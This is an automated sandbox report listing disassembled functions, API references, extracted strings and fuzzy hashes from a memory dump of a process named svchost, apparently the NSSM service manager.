Instruction ID: ec264b7909b663423e436220cfe4819a88d4f1dffac62785d33a99ea7066e5a1
Opcode Fuzzy Hash: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
Instruction Fuzzy Hash: B11154B1654300AFD320DB64DD46BEB77E4AF8C704F40482DB699D61D0EBB895488F96

Function 00415988 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00415994

Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441

__amsg_exit.LIBCMT ref: 004159B4
__lock.LIBCMT ref: 004159C4
InterlockedDecrement.KERNEL32(?), ref: 004159E1
InterlockedIncrement.KERNEL32(02502250), ref: 00415A0C

Strings

H*B, xrefs: 004159EB

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: H*B
API String ID: 4271482742-1987176958
Opcode ID: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
Instruction ID: 0f1790ebc6eee61fc3f291717e61b7ca4878fd8235e58e257555a432dd93126f
Opcode Fuzzy Hash: ae82dc6bd3ee7ef20407319b7cb59c0de88f678f5595f3ffd61352e31e938958
Instruction Fuzzy Hash: F2012B71A10B21EBC720AB25A4053DE77B0BF80724F01015BE804A3380C7BC99C2CBCE

Function 0040D300 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

get_service_dependencies(), xrefs: 0040D3BA
lpDependencies, xrefs: 0040D3BF

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: get_service_dependencies()$lpDependencies
API String ID: 0-219018013
Opcode ID: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
Instruction ID: 3e3e4e8d9a81c198e56250067319da3111a355b174864df4f52def3845c595e2
Opcode Fuzzy Hash: bf4c0c836f5ec2d75db8984220f7ba768897816f801aee747be6389641c48457
Instruction Fuzzy Hash: 3F51C1B19002019FD724DF99D880AA7B3F5FF94315F24492EE885972C1EB78E898CB95

Function 0040E350 Relevance: 9.1, APIs: 6, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
Instruction ID: 41e637edb1b435abd6f35276a328e9c15e151e7885b7bbb8ba59d22f3675d668
Opcode Fuzzy Hash: f6db5205aaf5c7a69da1a2ed089abba3dd97014ecf3ecdbfc37bc27497026141
Instruction Fuzzy Hash: 9F21F4F2900200B7D710ABA6FC89FDB7B6CDF9935AF00403AFA48D6142E779D4558A79

Function 00405820 Relevance: 9.0, APIs: 6, Instructions: 31COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,00000406), ref: 0040583A
EnableWindow.USER32(00000000), ref: 00405843
GetDlgItem.USER32(00000000,00000407), ref: 00405852
EnableWindow.USER32(00000000), ref: 00405855
GetDlgItem.USER32(00000000,00000408), ref: 00405864
EnableWindow.USER32(00000000), ref: 00405867

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: EnableItemWindow
String ID:
API String ID: 3833022359-0
Opcode ID: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
Instruction ID: 2ec9d1a14a3b6aefc49800d07f008e7303e744d1587428ffcda7d95d197ea67b
Opcode Fuzzy Hash: afe6c0985e8651cac2700cf40326becd62c8317a26ee51371698d98f401e2890
Instruction Fuzzy Hash: A8E012F2B0131476D520EBFA9CD8C97ABACEFC9A51B418815B74497050C979D502C778

Function 00411CB0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

LocalSystem, xrefs: 00411CCE, 00411CFD, 00411D12, 00411DD3, 00411DEF, 00411E18

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem
API String ID: 0-3718507506
Opcode ID: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
Instruction ID: c55ad329f1ab7e7a319801d33323cd4f3fc7c6193fc44e9fe0b0950f6bea607c
Opcode Fuzzy Hash: 004bf6b67739aa68ca3577fdd567ccf4bb5dc038922f0632643093c5b059ae31
Instruction Fuzzy Hash: 1C512A72E043405BD6205779BC45BD737989B81738F08063AFE65D73E1E72CEC8882AA

Function 0040FEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 0040D950: GetProcessHeap.KERNEL32(00000008,00070510,?,00406684), ref: 0040D958
Part of subcall function 0040D950: HeapAlloc.KERNEL32(00000000,?,00406684), ref: 0040D95F

__snwprintf_s.LIBCMT ref: 0040FF11

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040FF73

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNELBASE(00000000,?,?,?,00000000,00000000), ref: 00405498

Strings

service, xrefs: 0040FF35
pre_install_service(), xrefs: 0040FF30

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap__snwprintf_s$AllocFreeLocalProcess__vsnwprintf_s_l_vfwprintf
String ID: pre_install_service()$service
API String ID: 792397322-3337766052
Opcode ID: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
Instruction ID: 26704b136dc3d9749b1074aa21864745be87e0fb96ff5d59f0470137026c55c2
Opcode Fuzzy Hash: 0711bef75259c87616e8d0ee0a386299807506027fbb92d94be555ef7681361a
Instruction Fuzzy Hash: 614170B29003026BC710EA54DC82EA77354EF91318F14413FF914A72C2E63DF9598799

Function 00411090 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

_fwprintf.LIBCMT ref: 00411123

Strings

( B, xrefs: 004110C7
%s, xrefs: 00411115

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: _fwprintf
String ID: %s$( B
API String ID: 394020290-3552019876
Opcode ID: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
Instruction ID: 76538ebeed6a30712826624a3ba4fa343d335bada35abf236fb5f47343afded2
Opcode Fuzzy Hash: fb6fc9bafc8bb4bc176331903f766b2f4ebe819c5f0e0d4e4c6cfed62a37235d
Instruction Fuzzy Hash: 8F313EB2A001007BD6109B766C45FAB775CDE85379F44053BFB58C3252EA28D885C67E

Function 00412582 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 004125A4
__calloc_crt.LIBCMT ref: 004125BD

Strings

`'B, xrefs: 004125E9
P%B, xrefs: 00412626
$B, xrefs: 004125D4

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: __calloc_crt
String ID: P%B$`'B$$B
API String ID: 3494438863-3853432223
Opcode ID: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
Instruction ID: 1080d359621281dac9eb6ef5654e348f9a9ff66b954d09d266db2da5be3808d7
Opcode Fuzzy Hash: 997647b863712a435c9349e70150364966e4c23e1ae828604da497abfce903e7
Instruction Fuzzy Hash: 3A11E73130461167E7348A2E7EA07E62393FB98324B94813FE601C73D0EAB8D8D3864C

Function 004160F4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00416100

Part of subcall function 00416431: __getptd_noexit.LIBCMT ref: 00416434
Part of subcall function 00416431: __amsg_exit.LIBCMT ref: 00416441

__getptd.LIBCMT ref: 00416117
__amsg_exit.LIBCMT ref: 00416125
__lock.LIBCMT ref: 00416135

Strings

x/B, xrefs: 00416142

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: x/B
API String ID: 3521780317-795736107
Opcode ID: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
Instruction ID: d97fba921eb6448607c153e5393f7921dba5c81f8b41dce901700528dcdb7151
Opcode Fuzzy Hash: 03e2c8ac26ea6515eeabbe517bac99320c8abe5d28215d78f32520cca3b08236
Instruction Fuzzy Hash: DDF06231900210ABD620BB6995027CD73E0AF44729F52811FA58097393CB2CD9818A5E

Function 0040F286 Relevance: 7.7, APIs: 5, Instructions: 214threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000EBA0,?,00000000,00000000), ref: 0040F356
GetLastError.KERNEL32(00000000), ref: 0040F361
RtlWakeConditionVariable.NTDLL(?), ref: 0040F3D7
SetServiceStatus.ADVAPI32(?,?), ref: 0040F45A

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ConditionCreateErrorLastServiceStatusThreadVariableWake
String ID:
API String ID: 1631654564-0
Opcode ID: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
Instruction ID: bb6d87cbd09c4234cba0dee68d7b7d15a758b73580d713f38b937c70a6fac446
Opcode Fuzzy Hash: a830473311122d4f58078e63b060d65950c81e0407da7c18076417680fa3d974
Instruction Fuzzy Hash: 544196F2904700EAE774DB64EC4AB9777A89B54304F004D3EF24EA71C2D67DB8558B68

Function 004118D0 Relevance: 7.6, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 0041192C
HeapFree.KERNEL32(00000000), ref: 00411933

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
Instruction ID: 95e30e043aeee65d45f2ad13466b3714bbfccf5d3bd7e18b30c1f789b8d743ce
Opcode Fuzzy Hash: 5f40a348833435727a258736f11675b437c072e383ba136c01367595f6cefcd7
Instruction Fuzzy Hash: 802156B5A043006FD700DBA9DC85F9B77E8EBC8714F444A69F958C7290D678ED48C762

Function 004115B0 Relevance: 7.6, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 0041160C
HeapFree.KERNEL32(00000000), ref: 00411613

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
Instruction ID: b959b81e1fe3a2bafc76a74eee7c013ba47a19e295bb6f17c30615ef93d79162
Opcode Fuzzy Hash: 7a493bd9209aa930e9bc628240199728c948fb4e2bca7b9b2bb2fbd14f4429dc
Instruction Fuzzy Hash: 7A2156B5A043006BD600DBA9DC85F9B77E8EBC8714F444A6DF958C7290D678ED08C766

Function 00414190 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 004141AE

Part of subcall function 004145CC: __mtinitlocknum.LIBCMT ref: 004145E2
Part of subcall function 004145CC: __amsg_exit.LIBCMT ref: 004145EE
Part of subcall function 004145CC: EnterCriticalSection.KERNEL32(?,?,?,0041267D,?), ref: 004145F6

___sbh_find_block.LIBCMT ref: 004141B9
___sbh_free_block.LIBCMT ref: 004141C8
HeapFree.KERNEL32(00000000,?,00420330,0000000C,00416422,00000000,?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C), ref: 004141F8
GetLastError.KERNEL32(?,004140C2,?,00000001,?,?,00414556,00000018,00420398,0000000C,004145E7,?,?,?,0041267D,?), ref: 00414209

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
Instruction ID: 78ddf74b6f23589f7df2c05dcf936a3b5e981393fab6882f78671dd489d308d8
Opcode Fuzzy Hash: 8ca263cfe194db8b0666dc6fb4ab876aeebdc161e256fe39dabbc450974d78f4
Instruction Fuzzy Hash: A8018F31E41201AADB306BA29C0ABCE7BA49F81769F51425FF404A6191CB7C8AC1CA9C

Function 0040A460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

kill_process, xrefs: 0040A507, 0040A53E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: kill_process
API String ID: 0-4017559064
Opcode ID: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
Instruction ID: 00686baf9cae64c418d2207327e1e792f3237e2728e58617ed409f1897315a47
Opcode Fuzzy Hash: c85e92e42890c1b61c6ed8003c775d2debb2e2522625328e364df6d926ae03a5
Instruction Fuzzy Hash: 53317675504300AED711DA29AC45BE7B7D8BF84718F44893EED98622C1E3BCEA18C697

Function 0040B240 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 0040B280
__snwprintf_s.LIBCMT ref: 0040B2A9

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetLastError.KERNEL32(00000000), ref: 0040B2CA

Strings

%lu, xrefs: 0040B29B

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterErrorLastQueryRegisterReportValue__snwprintf_s__vsnwprintf_s_l
String ID: %lu
API String ID: 2741730872-685833217
Opcode ID: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
Instruction ID: 9b57c4e92f1354976d5d0f2d51147bf8e68e588caea2cac463da8bdf8903c173
Opcode Fuzzy Hash: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
Instruction Fuzzy Hash: 911190B1504300AFD210DB55DC4AFAFB7E8EB8D718F40492DF649A6281D674E944CBAB

Function 004087E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 0040880C

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegDeleteValueW.ADVAPI32(?,?,?,?,?,?,?,00000000), ref: 0040884B

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

delete_createfile_parameter(), xrefs: 0040881A
%s%s, xrefs: 004087FE

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeleteDeregisterRegisterReportValue__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$delete_createfile_parameter()
API String ID: 1707313777-3045456684
Opcode ID: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
Instruction ID: d1234627bce7d3409ed959c761f7b8d746fd5414b944bb09aaf7c4e8fca72bae
Opcode Fuzzy Hash: 7e0672d7530e772f14729283f7dc31a498a76e7525d1e09c63b7890c8cbcece8
Instruction Fuzzy Hash: 6201DFB2A142006FE700A759CD02FEFB7E8AB99714F80051EF615D72D1F5B8A8818BD6

Function 00405400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

nssm, xrefs: 00405404

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport
String ID: nssm
API String ID: 3235303502-2602286837
Opcode ID: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
Instruction ID: d3648bf1d166a2bd8de7c6c9c4a863b798114447eb191853c28b7c632e5ffc8e
Opcode Fuzzy Hash: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
Instruction Fuzzy Hash: D8F0A4B0505711ABE714DB04DC19BFBBBA5EF88705F40842CF542EA2C0D774D9418F9A

Function 00401070 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON

Download Yara Rule

Strings

NT Authority\LocalService, xrefs: 0040109C
LocalSystem, xrefs: 00401088

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: LocalSystem$NT Authority\LocalService
API String ID: 0-2498893882
Opcode ID: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
Instruction ID: 5088a37f203b1a9eb05045d2fec1edf7ec2d004d2db4fae365a24f9b45aa7680
Opcode Fuzzy Hash: 4bd61c4bc6cb448a9bbe4fa92f22af8cd3c41b511943c0e539e243abe0924b40
Instruction Fuzzy Hash: 35E0483179452A62DB212B2CBC05FD727995B45742F448073B450DB1D2D75CCDC352ED

Function 004160B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 004160C8

Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FA0
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FAD
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FBA
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FC7
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FD4
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00415FF0
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(00000000), ref: 00416000
Part of subcall function 00415F8E: InterlockedIncrement.KERNEL32(?), ref: 00416016

___removelocaleref.LIBCMT ref: 004160D3

Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(004178FE), ref: 00416037
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83000001), ref: 00416044
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(B9C972C2), ref: 00416051
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B660AC2), ref: 0041605E
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 0041606B
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(3B66D18B), ref: 00416087
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(83C0B70F), ref: 00416097
Part of subcall function 0041601D: InterlockedDecrement.KERNEL32(000009B2), ref: 004160AD

___freetlocinfo.LIBCMT ref: 004160E7

Part of subcall function 00415E45: ___free_lconv_mon.LIBCMT ref: 00415E8B
